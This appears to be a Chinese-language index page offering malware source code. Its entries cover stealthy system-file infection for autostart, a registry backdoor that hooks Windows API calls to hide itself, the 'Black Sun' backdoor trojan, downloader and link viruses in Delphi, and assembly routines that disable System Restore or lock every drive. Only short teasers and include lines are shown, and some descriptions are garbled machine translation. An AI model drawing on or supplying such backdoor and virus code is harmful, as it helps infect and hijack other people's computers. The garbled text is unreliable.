感染系统文件实现自启动
在众多随系统启动的方法中,感染系统文件是一种比较隐蔽的方法,可以做到使被感染的系统文件大小和时间都不变,而且无需修改注册表,一般人很难发现。下面就为大家详细介绍这种方法。 分析 方法很简单,只要将一段
Backdoors 注册表后门源代码
二进制存储在注册表中的参数infektit Explorer.exe的代码,在启动时分配内存,它读取在此设置,并创建一个流拦截功能CreateProcessW和剪接RegEnumValueW为了掩饰我们的关键删除钩子需要绕过分队等)使用内核驱动程序
Black Sun Backdoor v1.0 木马后门源代码
lacksun远程管理工具 - 一个用于远程管理,或干脆把系统 - 一个后门,这是一个秘密的“门中的系统”。首先,我想提请你注意的版本 - 1.0 prebeta。这意味着,这只是一个测试版本,其使用的真实情况并非如
下载者病毒-浪费用户带宽代码
DELPHI语言typeTDownloadInfo = record / / structure of the header information filel_link: Byte ; / / length of referencel_saveto: Byte ; / / path length conservationrun: Byte ; / / to run the file or
link viruse tags
DELPHI语言写的链接病毒具体实现什么功能大家自己看代码吧! uses SysUtils, SHLObj, ActiveX, windows, comobj, shellapi; Add section
Wonder.Waffle.9000源码
.386.model flat,stdcalloption casemap:none include \masm32\include\windows.incinclude \masm32\include\w2k\native.incinclude \masm32\include\kernel32.incinclude \masm32\include\user32.inc
禁用系统还原-ASM代码
.386 . Model Flat ,STDCALL Option casemap :none include \ MASM32 \ include \ kernel32. inc includelib \ MASM32 \ lib \ kernel3
锁定系统中所以逻辑驱动器代码
锁定系统中所以逻辑驱动器代码恶搞小程序!如果你想想力足够丰富的话可以写出更好的!呵!呵!!!在这里就不演示了!!!Code:
.386. Model Flat , STDCALLOption casemap : noneinclude \ MASM32 \ include
